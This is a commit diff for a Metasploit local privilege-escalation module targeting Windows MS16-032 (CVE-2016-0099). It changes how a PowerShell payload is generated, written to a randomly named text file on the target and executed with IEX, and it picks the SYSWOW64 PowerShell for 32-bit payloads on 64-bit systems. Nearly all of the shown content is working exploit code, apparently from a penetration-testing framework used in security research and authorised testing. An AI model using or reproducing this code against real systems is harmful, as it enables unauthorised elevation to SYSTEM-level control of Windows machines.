Fix Payload Generation

Payload generation now only occurs once and function 'setup_pay' removed. Payload is generated with cmd_psh_payload and is mutated to fit dropped text file.
2016-06-23 11:20:22 -04:00 · 2016-06-23 11:20:22 -04:00 · 40d7de05ef
parent df1a9bee13
commit 40d7de05ef
1 changed files with 14 additions and 32 deletions
--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@ -5,10 +5,11 @@

 require 'msf/core'
 require 'msf/core/payload_generator'
+require 'msf/core/exploit/powershell'
 require 'rex'

 class MetasploitModule < Msf::Exploit::Local
-  Rank = GoodRanking
+  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Post::File
@ -93,9 +94,19 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
    ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve-2016-0099.ps1')
    vprint_status("PS1 loaded from #{ps_path}")
    ms16_032 = File.read(ps_path)
+    cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
+    if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
+      cmdstr.gsub!("System32","SYSWOW64")
+      print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
+      vprint_warning("#{cmdstr}")
+    end

-    # Using venom_generator to produce compressed powershell script.  See class at bottom of module.
-    payl = setup_pay
+    #payload formatted to fit dropped text file
+    payl = cmd_psh_payload(payload.encoded,payload.arch,{:encode_final_payload => false, :remove_comspec => true, :method => 'old'})
+    payl.sub!(/.*?(?=New-Object IO)/im, "")
+    payl = payl.split("';$s.")[0]
+    payl.gsub!("''","'")
+    payl = "$s=#{payl}"

    @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
    path = datastore['W_PATH'] || pwd
@ -106,13 +117,6 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
    fd.close
    psh_cmd = "IEX `$(gc #{@upfile})"

-    cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
-    if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
-      cmdstr.gsub!("System32","SYSWOW64")
-      print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
-      vprint_warning("#{cmdstr}")
-    end
-
    #lpAppName
    ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
    #lpcommandLine - capped at 1024b
@ -158,26 +162,4 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
    end
  end

-  def setup_pay
-    generator_opts ={}
-
-    generator_opts[:payload] = datastore['PAYLOAD']
-    generator_opts[:datastore]= datastore
-    generator_opts[:format] = "psh-net"
-    generator_opts[:framework] = framework
-    begin
-      venom_generator = Msf::PayloadGenerator.new(generator_opts)
-      psh_payload = venom_generator.generate_payload
-    rescue ::Exception => e
-      elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
-      print_error(e.message)
-    end
-    compressed_payload = compress_script(psh_payload)
-    encoded_payload = encode_script(compressed_payload)
-    pay1 = compressed_payload
-
-    vprint_status("Payload size: #{compressed_payload.size}")
-    return pay1
-  end
-
 end